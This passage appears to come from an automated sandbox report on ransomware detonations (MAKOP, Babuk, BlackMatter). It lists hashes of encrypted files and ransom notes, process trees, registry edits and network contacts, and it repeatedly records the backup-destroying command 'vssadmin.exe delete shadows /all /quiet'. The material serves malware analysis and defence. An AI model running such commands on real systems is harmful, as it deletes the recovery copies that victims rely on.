| MD5 | 3697525427d6bb4902c016c932367680 |
| SHA1 | 98cfe25bdf580aa2b46e5297b0f25618321a05fa |
| SHA256 | b5dd5d4989f6253e95084f289d916feef445d6519c4e2bb604c359e29c5ea8bf |
| SHA512 | 3977c0bc2fb49726bec9aa921a14e0283f89a08b73c7f9672dfed1f428e94c8acd1dcbbd43e81ba749976617fd6d103a99dbc50d75df5ece880e6e863d1a98ba |
C:\USERS\ADMIN\DESKTOP\POPSHOW.DOCX.CRYPT
| MD5 | e0ebdf33726aae1d7841381b0ff979c3 |
| SHA1 | c488831d48f496656080adfed8dfbc55da5093c5 |
| SHA256 | fa7dc27832a92316c47d84a7d3ad886369eefcdbddf537b2ce934ce937948fdf |
| SHA512 | 73f4325e64bf9c8210f88b3c62069ce6ec947c356f3f654141a3ef685e53bc086936c8b59a661bf5529b3507434078e8b729da1905095c44fb64b5eb33e177fa |
C:\USERS\ADMIN\DESKTOP\POPREPAIR.PPS.CRYPT
| MD5 | d976b33d9b0be4e0103a1ca48bc3d13c |
| SHA1 | 9baa91e6a554662931404c18a36f80cf2fda1224 |
| SHA256 | f27ea6c1b72a7a62a013061c857337afa5ad324c7427cea072846892d43db214 |
| SHA512 | 655b992dab3ac8209c84da47b87e4148873e9058387381af6733e68ddb1c2dea6bb663edb2eb136143ed1baf5924312ed89e207c1c00c52b528cb441fe043a93 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin
| MD5 | 2350b47261040b1ee32f7df427ab30fc |
| SHA1 | e656cced405e01b6a60b7444b2c9e1b31ed7c63a |
| SHA256 | 612881f476b4820221970c20f44ee5d9cd9c64a2cd3c9ec82e6757209c0184db |
| SHA512 | a9e5838e63c2f786d57fd3e808ed54c6af0f7fc60dcc9cc1d606309d976c1b8954ef6271838db3e20325a6d66889362e3f28825a6fdba5075b860efc43d1d941 |
C:\USERS\ADMIN\DESKTOP\LOCKOUT.XLSX.CRYPT
| MD5 | bfbe8b30aafe9584fc3ce7e6ea7a52bd |
| SHA1 | 8453702da1b38b06f8968b2fef3e41df9f1cd7a4 |
| SHA256 | 01c9c67dc5d4dbe573f993622632166e0b41d72e579458c152e7fb66908d0a7d |
| SHA512 | 585a0b1b51ff08a29738b8cdf93b7705696382d8a457e6107516f223195c697a64a29fc1bad19a5a0f48b72b580af45ca6409421c3ff08f7a32e2f9b98a76798 |
C:\USERS\ADMIN\DESKTOP\GRANTEDIT.DLL.CRYPT
| MD5 | b69fa40fe3a18c578c5c9314756b6a10 |
| SHA1 | a3fa8dcada3ffe3deff4611d11367e46d74ec33f |
| SHA256 | 5f682761588f3f1d95a64f1886f109eba2092f65207ec52365e60a06c79b7622 |
| SHA512 | 7dbd9ad40d3137f845ed1747fc4231bdab82b44854456616e273ce02b619e969f43682fc2f4c2d3ed07b292c72afc583bd654f941bef35c11c2cca0f3832dc54 |
C:\USERS\ADMIN\DESKTOP\DESKTOP.INI.CRYPT
| MD5 | 718404539d55dc799af289df2922402f |
| SHA1 | aaaac41aede0e09cc9e32eb492d71320a0d68822 |
| SHA256 | 9b784d878936df4b1b912a245dea6ebf90848777b26e27cd9aaded29a8f2442d |
| SHA512 | 0bf614566590995bccde3d0553742e04f5c7c3560b1006823589163d0274fceca7c5b66090906fb74add518db2b7eab2745dc7e0e15f47ebb03d9f562c1f5489 |
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI.CRYPT
| MD5 | 23ca926074f3177efefc057fdce61909 |
| SHA1 | c6900ac94ccf77b5860c3cbc7961f1bee2462574 |
| SHA256 | 0f571fc5ba58a8bd8f8d5983e60d71ea54a748d789860780c59bcc03a12d3bbe |
| SHA512 | c07eae9d2257c6a39b723af11b5f4f988dc3a1f5e120df49dde74767249374f1948728c65d0500e75cbdfeb2aef7d2f2debaf88546db2dad1c56299dd1595251 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
| MD5 | c6bdb2c17c82f117224e609cae65e5dd |
| SHA1 | 3f1e92be35ca40127233dc55776a9ea151efc00e |
| SHA256 | cd7f1225a8e24bac0da13c1ff6559f8492cd6cbce920ca87b12c2e017d1c177e |
| SHA512 | 46c28e86c3956ec81d96bcad06a5ab90087a9bcd971efa91188584e75f9fe21cb41458ac0ff215911543d1417b131e3a8847d9cb5d0998c8f48c90cc90938586 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin
| MD5 | 0f7dff66a128cced04327977bc7b5e7a |
| SHA1 | d7b4ec941cfc3dec39525b047ca8f02e12061192 |
| SHA256 | da07d7603eadcd9d567889527fd3548990260ce623b891acb527486f234807d1 |
| SHA512 | 45a88d12fedd37014eca03ddf5628fa7c4509270098f2c08412825ac50aeeab37bde8608b8a76a7f8504e6d6b3ad87b676ae69bdffa491620e7d2f2210ff50ae |
memory/4804-22287-0x00000000046A0000-0x00000000046A1000-memory.dmp
memory/3688-22294-0x000001563AD00000-0x000001563AE00000-memory.dmp
memory/3688-22293-0x000001563AD00000-0x000001563AE00000-memory.dmp
memory/3688-22309-0x000001563BCB0000-0x000001563BCD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini
| MD5 | e0fd7e6b4853592ac9ac73df9d83783f |
| SHA1 | 2834e77dfa1269ddad948b87d88887e84179594a |
| SHA256 | feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122 |
| SHA512 | 289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55 |
memory/3688-22292-0x000001563AD00000-0x000001563AE00000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
| MD5 | 14e6a23a73c1daf677d9380cc5ab0ff6 |
| SHA1 | 71360d640b94d01a4c11848620cd5edef7354b83 |
| SHA256 | cc2f94a6e4190c944389d2bc3e6c1a72e1a6a3c06b37347b27546dd3f44e3d00 |
| SHA512 | 04e415011fc5f76cc2249e45154d6807baf687cd4063edb9bf8f2cdf342c66492e0630d41e0bc8583664b08e4d017bf3a19eeb378e49d75ce9b2a1098550ec41 |
memory/3688-22332-0x000001563BC70000-0x000001563BC90000-memory.dmp
memory/3688-22346-0x000001563C420000-0x000001563C440000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XNP9L40F\microsoft.windows[1].xml
| MD5 | a7237b6af01e07ac7d6ab6e6cdc2d0d3 |
| SHA1 | 717b37a5b71c978fbd8dcae6a001c1240ded3ecf |
| SHA256 | 2f1bea9130376d79550c47fa39423f14c1f8bed1ecd5cf7786c0728c25c40828 |
| SHA512 | 5513cda40fbfc32a7676fad05f7c115882de0857a379f5ab48bc60e0790ffc520222896f7e3732b71bd82b0c4355a51764c99145500be0c04c24f31c1f232810 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648350685966153.txt
| MD5 | ecaea544af9da1114077b951d8cb520d |
| SHA1 | 5820b2d71e7b2543cf1804eb91716c4e9f732fde |
| SHA256 | 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6 |
| SHA512 | dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
| MD5 | 15ca64d1fbbd741533ee7ed0547a167e |
| SHA1 | be93f638368c73fb1cd3c48ec0386bf1b526e4c8 |
| SHA256 | 26bff0d8a321a62197c34e0ccf63b5b673559245fb18982afacc4f72def7abb9 |
| SHA512 | 78a276b9ebb5a81324d9402a859fcd6cfe02f04211da729b88a8fa79d3a968c0e75e48bcd16e8691b5ad57718fa161a12c992227978abb2c4471b141679e6b47 |
memory/3712-22477-0x0000000002780000-0x0000000002781000-memory.dmp
F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
memory/3944-22481-0x0000029248D00000-0x0000029248E00000-memory.dmp
memory/3944-22482-0x0000029248D00000-0x0000029248E00000-memory.dmp
memory/3944-22487-0x0000029249D20000-0x0000029249D40000-memory.dmp
memory/3944-22506-0x000002924A0F0000-0x000002924A110000-memory.dmp
memory/3944-22491-0x00000292499E0000-0x0000029249A00000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
| MD5 | 1033bd83533c62faec9fd85f4877e447 |
| SHA1 | 7fa5e4e4eeb7ab7ab1ef0a77e4e1cfdce234fd86 |
| SHA256 | 5eac1a6ad953fe54affc7b086058aa71d6e340a583b9f01325433b31b50cf63f |
| SHA512 | 1ca348d9b08838d5ca5fd404188a44140c7181fefcd714adae41bc8296bac55c519bc92b37b1af175f513900964c3bbae7586b178848691ba17c0c4e6f141ba2 |
memory/1624-22625-0x0000000004E00000-0x0000000004E01000-memory.dmp
memory/2380-22627-0x0000027C75500000-0x0000027C75600000-memory.dmp
memory/2380-22629-0x0000027C75500000-0x0000027C75600000-memory.dmp
memory/2380-22632-0x0000027C764B0000-0x0000027C764D0000-memory.dmp
memory/2380-22649-0x0000027C76470000-0x0000027C76490000-memory.dmp
memory/2380-22664-0x0000027C76880000-0x0000027C768A0000-memory.dmp
memory/2508-22773-0x0000000004A20000-0x0000000004A21000-memory.dmp
memory/4200-22777-0x0000025275000000-0x0000025275100000-memory.dmp
memory/4200-22776-0x0000025275000000-0x0000025275100000-memory.dmp
memory/4200-22781-0x0000025275FD0000-0x0000025275FF0000-memory.dmp
memory/4200-22791-0x0000025275F90000-0x0000025275FB0000-memory.dmp
memory/4200-22794-0x00000252763A0000-0x00000252763C0000-memory.dmp
memory/3640-22908-0x0000000004520000-0x0000000004521000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{6ACD7EAB-A077-4062-B626-CBB2C4C42BD8}.png
| MD5 | 00e5fcfd833151f7cbde607e2f7afeb4 |
| SHA1 | 55839875c0947aafebff53d22ccc5dad29fe3563 |
| SHA256 | b80192aaabe007baecd0603e3ce183e9d554b8a6b0411d20716acfa086ae3035 |
| SHA512 | f056777a1987c3becdc217bdc2d82e6aa41086d38fddaa45c42f1726b6f7b7616a10918081650e825a724464ef148b669bc258d38a62e0de8642e2607a0b0de7 |
memory/4636-22916-0x00000116AEE20000-0x00000116AEE40000-memory.dmp
memory/4636-22929-0x00000116AEBE0000-0x00000116AEC00000-memory.dmp
memory/4636-22942-0x00000116AF1F0000-0x00000116AF210000-memory.dmp
memory/3036-23057-0x0000000002990000-0x0000000002991000-memory.dmp
memory/3656-23060-0x000001F91FF00000-0x000001F920000000-memory.dmp
memory/3656-23061-0x000001F91FF00000-0x000001F920000000-memory.dmp
memory/3656-23065-0x000001F920E90000-0x000001F920EB0000-memory.dmp
memory/3656-23088-0x000001F921260000-0x000001F921280000-memory.dmp
memory/3656-23074-0x000001F920E50000-0x000001F920E70000-memory.dmp
memory/652-23205-0x0000000004650000-0x0000000004651000-memory.dmp
memory/1096-23209-0x0000024BDB820000-0x0000024BDB920000-memory.dmp
memory/1096-23210-0x0000024BDB820000-0x0000024BDB920000-memory.dmp
memory/1096-23213-0x0000024BDC830000-0x0000024BDC850000-memory.dmp
memory/1096-23208-0x0000024BDB820000-0x0000024BDB920000-memory.dmp
memory/1096-23230-0x0000024BDC7F0000-0x0000024BDC810000-memory.dmp
memory/1096-23233-0x0000024BDCC00000-0x0000024BDCC20000-memory.dmp
memory/2956-23348-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
memory/3532-23349-0x000002C843900000-0x000002C843A00000-memory.dmp
memory/3532-23351-0x000002C843900000-0x000002C843A00000-memory.dmp
memory/3532-23350-0x000002C843900000-0x000002C843A00000-memory.dmp
memory/3532-23355-0x000002D0458D0000-0x000002D0458F0000-memory.dmp
memory/3532-23381-0x000002D045CA0000-0x000002D045CC0000-memory.dmp
memory/3532-23380-0x000002D045890000-0x000002D0458B0000-memory.dmp
memory/4800-23493-0x00000000043D0000-0x00000000043D1000-memory.dmp
memory/4456-23502-0x00000217617C0000-0x00000217617E0000-memory.dmp
memory/4456-23515-0x0000021761780000-0x00000217617A0000-memory.dmp
memory/4456-23524-0x0000021761D90000-0x0000021761DB0000-memory.dmp
memory/1512-23641-0x0000000004440000-0x0000000004441000-memory.dmp
memory/3304-23645-0x00000162ABE00000-0x00000162ABF00000-memory.dmp
memory/3304-23646-0x00000162ABE00000-0x00000162ABF00000-memory.dmp
memory/3304-23671-0x00000162AD180000-0x00000162AD1A0000-memory.dmp
memory/3304-23660-0x00000162ACB70000-0x00000162ACB90000-memory.dmp
memory/3304-23649-0x00000162ACBB0000-0x00000162ACBD0000-memory.dmp
memory/3304-23644-0x00000162ABE00000-0x00000162ABF00000-memory.dmp
memory/3596-23783-0x0000000004560000-0x0000000004561000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:14
Platform
win10v2004-20240704-en
Max time kernel
1660s
Max time network
1157s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
| PID 3820 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3820 -ip 3820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 948
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsvACBC.tmp\System.dll
| MD5 | fccff8cb7a1067e23fd2e2b63971a8e1 |
| SHA1 | 30e2a9e137c1223a78a0f7b0bf96a1c361976d91 |
| SHA256 | 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e |
| SHA512 | f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c |
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1559s
Max time network
1569s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (450) files with added filename extension
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
Files
\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt
| MD5 | b6e97028103bc6b18214f4b2bd0e0d23 |
| SHA1 | 4c202c77782d55af635c28fa71b2ba58b294415e |
| SHA256 | db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45 |
| SHA512 | 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d |
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1584s
Max time network
1570s
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (1641) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | N/A |
Reads user/profile data of web browsers
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5040 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 5040 wrote to memory of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 936 wrote to memory of 3592 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 936 wrote to memory of 3592 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 5040 wrote to memory of 952 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 5040 wrote to memory of 952 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe | C:\Windows\System32\cmd.exe |
| PID 952 wrote to memory of 3052 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 952 wrote to memory of 3052 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt
| MD5 | b6e97028103bc6b18214f4b2bd0e0d23 |
| SHA1 | 4c202c77782d55af635c28fa71b2ba58b294415e |
| SHA256 | db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45 |
| SHA512 | 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 7c39bb1f4920be2be02ae6ad4fefd614 |
| SHA1 | 3fe56e7fcbde259aba45ad36c95265bb0d3746ab |
| SHA256 | b5a0040ff5d4baccac5aff5b5fe8526f5846bf393ba6bc9c393f15a8a04a75ae |
| SHA512 | 1af7546ca3565087412d9640a81a20e51e0cc01c9399a0f602f72593e950715ac46a32de0b9e234e352debfb967a2c00bba8b711ae8dc7cfc3935d6e78107568 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 931cfaf9eaab8a1c9aaeeb81c308b20b |
| SHA1 | 61f5233b87497ca7db82b65cc8b7859543bf401a |
| SHA256 | 8860ba65755bc59c3068fd49262d3e95050741284a1969dd9b3aa45adf152b1b |
| SHA512 | 885d124cce3056bc2d4aa2669219d4b40249bb5eaec2630974763881ff3633d455582cc5a66697f96fdad2424ed7b20595c1793cd46c6b8acd5721fe3c1f53fd |
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1778s
Max time network
1153s
Command Line
Signatures
BlackMatter Ransomware
Renames multiple (153) files with added filename extension
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\YgLqz8iqA.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\YgLqz8iqA.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 204.11.56.48:443 | paymenthacks.com | tcp |
